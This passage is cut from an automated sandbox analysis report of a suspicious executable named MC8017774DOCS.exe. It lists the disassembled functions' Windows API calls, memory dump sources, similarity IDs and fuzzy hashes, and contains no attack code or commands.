                                                                                                                                                    • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                                                                                    Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                    Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                                    • Instruction ID: a51ecd0892fb275ea92473d319bbbc5ec4fc6164fb370921ec18ec876cc9dfbc
                                                                                                                                                    • Opcode Fuzzy Hash: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                                    • Instruction Fuzzy Hash: A6D05E73E142008BD750DBB8BA8945E73A8F781319320C83BE102F1191E97888524A2D
                                                                                                                                                    Function 6E9B121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                    • Opcode ID: 48dbb8e4c8f8ca428386e58555ef1fd3e1b904a63f28e80f17476d73618d95f8
                                                                                                                                                    • Instruction ID: 16b9b287306c2c5edced05e883cd2cb4b662194eaa923d0e2cb8a494d082f272
                                                                                                                                                    • Opcode Fuzzy Hash: 48dbb8e4c8f8ca428386e58555ef1fd3e1b904a63f28e80f17476d73618d95f8
                                                                                                                                                    • Instruction Fuzzy Hash: B8B001F1E48900EFEF40DBB9CD4AF3636A8EF86705F448050FA06D9285E6B49C159A39

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                                                                                      • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405637
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405686
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004056CB
                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405766
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                                                                                    • CloseClipboard.USER32 ref: 004057C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                    • String ID: {
                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                    • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                                    • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                                                                                    • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                                    • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                                                                                    Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                                    • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                                      • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                      • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                                      • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                      • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                                      • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
                                                                                                                                                    • API String ID: 2624150263-2308116694
                                                                                                                                                    • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                                    • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                                                                                    • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                                    • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                                                                                    Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 004021C3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                                                                                                    • API String ID: 542301482-3732074636
                                                                                                                                                    • Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                                    • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                                                                                                    • Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                                    • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                                                    Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                    • Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                                    • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                                                                                                    • Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                                    • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                                                                                                    Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                                                                                                    • GetSysColor.USER32(?), ref: 004044AD
                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404550
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004045CF
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004045EB
                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
